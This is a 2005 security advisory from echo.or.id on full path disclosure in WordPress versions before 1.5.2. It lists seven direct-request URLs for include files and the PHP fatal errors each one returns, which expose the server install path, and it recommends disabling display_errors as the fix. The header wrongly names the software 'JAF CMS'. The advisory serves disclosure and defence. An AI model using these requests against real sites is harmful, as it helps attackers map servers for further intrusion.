ECHO.OR.ID ECHO_ADV_24$2005 --------------------------------------------------------------------------- [ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2 --------------------------------------------------------------------------- Author: Dedi Dwianto Date: Dec, 20th 2005 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv24-theday-2005.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : JAF CMS version: < 1.5.2 URL : http://wordpress.org/ Description : WordPress is a very popular personal publishing platform aka blog software, and is used by everyone from celebrities, to government officials, to non technical average joe's. --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Full path disclosure: A remote user can access the file directly to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker. * http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul POC : http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul Fatal error: Call to undefined function: get_settings() in /var/www/html/blog/wp-includes/vars.php on line 106 * http://victim/[WP Folder]/wp-content/plugins/hello.php POC : http://localhost/blog/wp-content/plugins/hello.php Fatal error: Call to undefined function: wptexturize() in /var/www/html/blog/wp-content/plugins/hello.php on line 44 * http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul POC : http://localhost/blog/wp-admin/menu-header.php?self=dudul PHP Fatal error: Call to undefined function: get_admin_page_parent() in /var/www/html/blog/wp-admin/menu-header.php on line 6 Fatal error: Call to undefined function: get_admin_page_parent() in /var/www/html/blog/wp-admin/menu-header.php on line 6 * http://victim/[WP Folder]/wp-admin/upgrade-functions.php POC : http://localhost/[WP Folder]/wp-admin/upgrade-functions.php Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: No such file or directory in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 * http://victim/[WP FOlder]/wp-admin/edit-form.php POC : http://localhost/blog/wp-admin/edit-form.php PHP Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3 Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3 * http://victim/[WP FOlder]/wp-settings.php POC : http://localhost/blog/wp-settings.php Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such file or directory in /var/www/html/blog/wp-settings.php on line 59 PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59 Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59 * http://victim/[WP FOlder]/wp-admin/edit-form-comment.php POC : http://localhost/blog/wp-admin/edit-form-comment.php Fatal error: Call to undefined function: __() in /var/www/html/blog/wp-admin/edit-form-comment.php on line 2 B. Fix For User and do not know how to fix the script , change php.ini file setting then turn on log_errors , and turn off display_error --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous ~ newbie_hacker@yahoogroups.com ~ #e-c-h-o@DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ the_day || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------